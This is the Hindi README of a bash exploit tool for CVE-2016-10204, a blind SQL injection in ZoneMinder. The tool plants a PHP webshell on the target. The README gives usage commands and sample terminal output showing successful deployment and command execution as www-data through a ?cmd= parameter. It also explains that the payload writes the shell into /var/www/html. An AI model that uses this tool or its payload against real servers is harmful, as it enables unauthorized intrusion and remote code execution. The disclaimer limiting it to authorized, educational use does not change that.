
एक bash स्क्रिप्ट जो CVE-2016-10204 के मैन्युअल शोषण को एक लक्ष्य एंडपॉइंट पर प्रदर्शित करती है, जिसके परिणामस्वरूप php webshell अपलोड होता है।
एक bash स्क्रिप्ट जो CVE-2016-10204 के मैन्युअल शोषण को एक लक्ष्य एंडपॉइंट के विरुद्ध प्रदर्शित करती है, जिससे एक php वेबशेल अपलोड होता है।
वर्तमान में, webshell वेरिएबल MySQL पेलोड के लिए सेट है। इसे आप जिस भी बैकएंड को लक्षित करना चाहते हैं, उससे बदला जा सकता है।
इस CVE के बारे में अधिक जानकारी इन स्रोतों पर मिल सकती है:
यह स्क्रिप्ट कई तरीकों से काम करती है:
उपयोग:
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/chmod +x CVE-2016-10204_Webshell.sh
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh testme http://127.0.0.1/zm/index.php
सामान्य उपयोग:
/bin/bash CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target_endpoint/zm/index.php>
सहायता:
उदाहरण:
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php
[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
[*]================================[*]
[*]Target Host: 192.168.177.52:3305 [*]
[*]Target Endpoint: http://192.168.177.52:3305/zm/index.php [*]
[*]================================[*]
[*]================================[*]
[*]Attempting webshell deployment. [*]
[*]================================[*]
Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or
Warning: consider "--output <FILE>" to save to a file.
Exit Code for Timeout: 23
[*]================================[*]
[*]Webshell deployment successful. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Execution is available via the ?cmd= parameter [*]
[*]================================[*]
पहले से शोषित लक्ष्य पर पुनः चलाना:
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php
[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
[*]================================[*]
[*]Target Host: 192.168.177.52:3305 [*]
[*]Target Endpoint: http://192.168.177.52:3305/zm/index.php [*]
[*]================================[*]
[*]================================[*]
[*]Webshell already deployed. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Execution is available via the ?cmd= parameter [*]
[*]================================[*]
शामिल सहायता:
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh -h
[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
CVE-2016-10204_Webshell
एक bash स्क्रिप्ट जो CVE-2016-10204 के मैन्युअल शोषण को एक लक्ष्य एंडपॉइंट के विरुद्ध प्रदर्शित करती है,
जिससे एक php वेबशेल अपलोड होता है।
अधिक जानकारी:
- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
- https://www.exploit-db.com/exploits/41239
- https://www.openwall.com/lists/oss-security/2017/02/05/1
उपयोग:
/bin/bash CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target/zm/index.php>
उदाहरण:
/bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php
नोट्स:
- शोषण का प्रयास करने से पहले जाँचता है कि कोई webshell पहले से मौजूद है या नहीं।
- /var/www/html में PHP webshell लिखने के लिए एक दुर्भावनापूर्ण SQLi पेलोड बनाता है।
- ?cmd= पैरामीटर के माध्यम से 'id' निष्पादित करके तैनाती की पुष्टि करता है।
- कृपया केवल उन उपकरणों के विरुद्ध जिम्मेदारी से उपयोग करें जिनकी आपके पास अनुमति है। यह केवल शैक्षिक उद्देश्यों के लिए है।